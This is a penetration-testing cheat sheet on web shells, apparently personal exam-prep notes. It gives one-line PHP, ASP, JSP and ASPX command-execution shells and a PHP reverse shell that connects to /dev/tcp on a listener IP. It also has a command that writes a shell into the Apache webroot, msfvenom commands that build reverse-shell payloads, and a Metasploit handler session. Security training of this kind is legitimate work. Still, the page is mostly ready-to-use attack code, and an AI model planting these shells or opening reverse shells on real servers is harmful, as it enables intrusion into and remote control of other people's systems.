Web Shell

References

Web Shells 101 Using PHP (Web Shells Part 2) | AcunetixAcunetix

Oneliner shell - Cheat sheet0xSs0rZ

Bind and Reverse Shell Shell / Reverse Shell

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheetpentestmonkey.net

Tools

Onelin3r

GitHub - D4Vinci/One-Lin3r: Gives you one-liners that aids in penetration testing operations, privilege escalation and moreGitHub

pip install one-lin3r

LazyShell

GitHub - aniqfakhrul/LazyShell: Script to generate reverse shellsGitHub

Webroot

Web Server Default Webroot

Web Server	Default Webroot
`Apache`	/var/www/html/
`Nginx`	/usr/local/nginx/html/
`IIS`	c:\inetpub\wwwroot\|
`XAMPP`	C:\xampp\htdocs\|

Apache

/var/www/html/

Nginx

/usr/local/nginx/html/

IIS

c:\inetpub\wwwroot|

XAMPP

C:\xampp\htdocs|

Custom shells

PHP

Linux

<?php system($_REQUEST['cmd']); ?>

http://SERVER_IP:PORT/uploads/shell.php?cmd=id

Windows

<?php echo exec($_GET["cmd"]);?>

Reverse shell - Linux

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/1234 0>&1'"); ?>

ASP

<% eval request('cmd') %>

With msfvenom

msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php

SecLists Webshells

ls /opt/seclists/Web-Shells/        
backdoor_list.txt  CFM  FuzzDB  JSP  laudanum-1.0  Magento  PHP  Vtiger  WordPress

Laudanum repo

Web-Shells/laudanum at master · jbarcia/Web-ShellsGitHub

cp /opt/seclists/Web-Shells/laudanum-1.0/aspx/shell.aspx .

Modify the shell for use

PHP

[Apr 08, 2024 - 03:50:25 (EDT)] exegol-CPTS /workspace # locate cmd.php
/opt/seclists/Web-Shells/FuzzDB/cmd.php

[Apr 08, 2024 - 03:51:51 (EDT)] exegol-CPTS /workspace # locate shell.php 
/opt/seclists/Web-Shells/PHP/another-obfuscated-phpshell.php
/opt/seclists/Web-Shells/PHP/obfuscated-phpshell.php
/opt/seclists/Web-Shells/WordPress/plugin-shell.php
/opt/seclists/Web-Shells/laudanum-1.0/php/php-reverse-shell.php
/opt/seclists/Web-Shells/laudanum-1.0/php/shell.php
/opt/seclists/Web-Shells/laudanum-1.0/wordpress/templates/php-reverse-shell.php
/opt/seclists/Web-Shells/laudanum-1.0/wordpress/templates/shell.php

<?php system($_REQUEST["cmd"]); ?>


echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php

?cmd=id

curl http://SERVER_IP:PORT/shell.php?cmd=id

p0wny shell

Automate the bypass of php functions restriction (as system, etc.)

Works on Linux and Windows

GitHub - flozz/p0wny-shell: Single-file PHP shellGitHub

JSP

[Apr 08, 2024 - 03:50:32 (EDT)] exegol-CPTS /workspace # locate cmd.jsp
/opt/seclists/Web-Shells/FuzzDB/cmd.jsp
/opt/seclists/Web-Shells/laudanum-1.0/jsp/warfiles/cmd.jsp
/opt/tools/SSRFmap/data/cmd.jsp
/opt/tools/clusterd/src/lib/resources/cmd.jsp

Apr 08, 2024 - 03:52:01 (EDT)] exegol-CPTS /workspace # locate shell.jsp
/opt/seclists/Web-Shells/JSP/simple-shell.jsp

<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>

ASP

[Apr 08, 2024 - 03:51:48 (EDT)] exegol-CPTS /workspace # locate shell.asp 
/opt/seclists/Web-Shells/laudanum-1.0/asp/shell.asp

<% eval request("cmd") %>

https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/asp/newaspcmd.asp

ASPX

[Apr 08, 2024 - 03:49:48 (EDT)] exegol-CPTS /workspace # locate cmd.aspx
/opt/seclists/Web-Shells/FuzzDB/cmd.aspx

[Apr 08, 2024 - 03:51:08 (EDT)] exegol-CPTS /workspace # locate shell.aspx
/opt/seclists/Web-Shells/laudanum-1.0/aspx/shell.aspx

Metasploit

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=1337 -f aspx > reverse_shell.aspx

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2819 bytes

msf6 exploit(multi/handler) > set LHOST 10.10.14.5

LHOST => 10.10.14.5


msf6 exploit(multi/handler) > set LPORT 1337

LPORT => 1337


msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.5:1337

Laudanum repo

Antak WebShell

nishang/Antak-WebShell at master · samratashok/nishangGitHub

Modify the shell for use

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LPORT=443 -f war > shell.war

msfvenom -p java/shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war

msf6 exploit(multi/handler)

Tomcat (8080)

TomcatHackTricks

Awesome-RCE-techniques/Frameworks/Apache-Tomcat at master · p0dalirius/Awesome-RCE-techniquesGitHub

GitHub - p0dalirius/Tomcat-webshell-application: A webshell application and interactive shell for pentesting Apache Tomcat servers.GitHub

Release 1.3.0 - Added api in JSP + minor improvements · p0dalirius/Tomcat-webshell-applicationGitHub

Shell ++

TTY Upgrade

PreviousShells NextBind and Reverse Shell

Last updated 2 months ago

References

Tools

Onelin3r

LazyShell

Webroot

Custom shells

PHP

Linux

Windows

Reverse shell - Linux

ASP

With msfvenom

SecLists Webshells

Laudanum repo

PHP

p0wny shell

PHPBash

wwwolf's PHP web shell:

PentestMonkey - Reverse shell

JSP

ASP

ASPX

Metasploit

Laudanum repo

Antak WebShell

WAR

Tomcat (8080)

Shell ++